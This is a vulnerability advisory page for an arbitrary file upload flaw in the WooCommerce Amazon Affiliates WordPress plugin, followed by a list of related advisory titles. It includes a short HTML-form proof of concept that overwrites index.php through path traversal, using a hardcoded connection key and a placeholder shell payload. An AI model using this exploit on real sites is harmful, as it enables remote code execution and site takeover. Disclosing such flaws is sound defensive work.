WooCommerce Amazon Affiliates – Arbitrary File Upload | Plugin Vulnerabilities

Description

This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload.

Version tested: 7.0

Proof of Concept

<form action="http://wordpress/wp-content/plugins/wwc-amz-aff/modules/remote_support/remote_tunnel.php" method="post" >
	<input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
	<input name="action" value="save_file" ><br>
	<input name="file" value="../../../index.php"><br>
	<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
	<input type="submit" ><br>
</form>

Affects Plugins

Fixed in 9.0.2.16

Fixed in 9.0.2.16

References

URL

https://packetstormsecurity.com/files/#131629/

URL

https://web.archive.org/web/20150912142022/https://research.evex.pw/?vuln=13

URL

https://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503

URL

https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_woocommerce_file_upload.rb

Miscellaneous

Submitter

A. Samman

Submitter twitter

Verified

No

WPVDB ID

24d4352f-956a-4d2a-9b50-77b3a8abff70

Timeline

Publicly Published

2015-04-25 (about 10 years ago)

Added

2015-04-26 (about 10 years ago)

Last Updated

2023-06-01 (about 2 years ago)

Other

Published

Title

Published

2024-10-14

Title

WordPress Gallery Plugin – Limb Image Gallery <= 1.5.7 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2025-11-10

Title

WP移行専用プラグイン for CPI <= 1.0.2 - Unauthenticated Arbitrary File Upload

Published

2024-05-14

Title

Copymatic – AI Content Writer & Generator < 1.7 - Unauthenticated Arbitrary File Upload

Published

2015-09-14

Title

EZ SQL Reports < 4.11.37 - Authenticated Arbitrary File Download

Published

2025-08-19

Title

Compress Then Upload < 1.0.5 - Admin+ Arbitrary File Upload